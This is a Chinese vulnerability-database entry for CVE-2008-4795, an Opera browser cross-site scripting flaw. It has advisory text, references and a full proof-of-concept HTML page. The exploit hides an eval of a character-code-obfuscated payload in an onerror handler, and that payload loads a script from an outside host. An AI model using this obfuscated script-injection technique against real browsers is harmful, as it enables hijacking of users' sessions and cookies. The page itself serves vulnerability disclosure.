Opera Web浏览器JavaScript URL链接跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116538 漏洞类型 跨站脚本
发布时间 2008-10-30 更新时间 2009-02-26
CVE编号 CVE-2008-4795 CNNVD-ID CNNVD-200810-508
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32548
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-508
|漏洞详情
Opera是挪威欧朋(OperaSoftware)公司所开发的一款Web浏览器,它支持多窗口浏览、可定制用户界面等。Opera的历史搜索没有正确地过滤某些用户提交的参数,远程攻击者可以借由跨站脚本攻击注入任意的网页脚本或html。链接面板可显示当前页面所有帧中的链接,包括JavaScriptURL链接。当页面位于帧中的时候,就会在最外面的页面而不是URL所在的页面执行脚本。这可能导致以不相关帧的环境执行脚本。
|漏洞EXP
source: http://www.securityfocus.com/bid/31991/info

Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, change the browser's settings, and launch other attacks.

Versions prior to Opera Web Browser 9.62 are vulnerable.

NOTE: The 'History Search' issue described here may be related to the 'History Search' issue that was previously described in BID 31842 'Opera Web Browser Multiple Cross Site Scripting Vulnerabilities'.

<!-- --Aviv. http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx --> <html> <script> function x() { window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="x()">Click me...</a> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'> </body> </html> # milw0rm.com [2008-10-30]
|参考资料

来源:BID
名称:31991
链接:http://www.securityfocus.com/bid/31991
来源:XF
名称:opera-linkspanel-xss(46220)
链接:http://xforce.iss.net/xforce/xfdb/46220
来源:SECTRACK
名称:1021127
链接:http://www.securitytracker.com/id?1021127
来源:www.opera.com
链接:http://www.opera.com/support/search/view/907/
来源:GENTOO
名称:GLSA-200811-01
链接:http://security.gentoo.org/glsa/glsa-200811-01.xml
来源:SECUNIA
名称:32538
链接:http://secunia.com/advisories/32538
来源:SUSE
名称:SUSE-SR:2008:023
链接:http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00012.html